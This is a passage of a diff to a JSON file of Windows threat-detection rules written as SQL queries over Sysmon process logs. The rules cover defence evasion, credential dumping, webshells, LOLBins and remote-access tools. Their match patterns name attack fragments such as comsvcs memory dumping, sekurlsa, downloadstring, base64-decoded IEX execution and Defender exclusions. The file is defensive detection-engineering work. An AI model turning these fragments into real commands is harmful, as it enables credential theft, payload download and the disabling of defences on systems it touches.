'%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Launch-VsDevShell.PS1 Proxy Execution", - "id": "45d3a03d-f441-458c-8883-df101a3bb146", + "title": "JSC Convert Javascript To Executable", + "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", "status": "experimental", - "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1216.001" + "attack.t1127" ], "falsepositives": [ - "Legitimate usage of the script by a developer" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" + "filename": "proc_creation_win_lolbin_jsc.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", - "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", + "status": "test", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Execute Code with Pester.bat as Parent", - "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", "status": "experimental", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1216" + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Legitimate use by administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pester.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "Powershell Defender Exclusion", - "id": "17769c90-230e-488b-a463-e05c08e9d48f", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "status": "experimental", - "description": "Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.010" ], "falsepositives": [ - "Possible Admin Activity", - "Other Cmdlets that may use the same parameters" + "FQDNs that start with a number" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-MpPreference %' ESCAPE '\\' OR CommandLine LIKE '%Set-MpPreference %' ESCAPE '\\') AND (CommandLine LIKE '% -ExclusionPath %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionExtension %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionProcess %' ESCAPE '\\' OR CommandLine LIKE '% -ExclusionIpAddress %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_defender_exclusion.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", - "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "status": "experimental", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Sysprep on AppData Folder", - "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", - "status": "test", - "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "status": "experimental", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysprep_appdata.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "title": "Custom Class Execution via Xwizard", + "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" }, { - "title": "Service Security Descriptor Tampering Via Sc.EXE", - "id": "98c5aeef-32d5-492f-b174-64a691896d25", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", "status": "experimental", - "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_sdset_modification.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Suspicious Execution Of PDQDeployRunner", - "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", - "status": "experimental", - "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "status": "test", + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the PDQDeploy tool to execute these commands" + "Legitimate deployment of AnyDesk" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Use of Adplus.exe", - "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", + "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", + "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "status": "experimental", - "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1003.001" - ], + "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", + "author": "Florian Roth (Nextron Systems), Hieu Tran", "falsepositives": [ - "Legitimate usage of Adplus" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_adplus.yml" + "filename": "proc_creation_win_powershell_download_dll.yml" }, { - "title": "Execution in Webserver Root Folder", - "id": "35efb964-e6a5-47ad-bbcd-19661854018d", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", "status": "test", - "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" ], "falsepositives": [ - "Various applications", - "Tools that include ping or nslookup command invocations" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_path_webserver.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' 